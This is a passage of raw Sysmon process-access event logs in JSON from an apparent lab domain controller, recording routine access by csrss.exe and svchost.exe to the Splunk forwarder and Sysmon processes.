{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3762,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1105-5F25-0000-0010D59A0500}\r\nTargetProcessId: 4792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010D59A0500}","TargetProcessId":"4792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3763,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3764,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3765,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3766,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3767,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3768,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3769,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3770,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 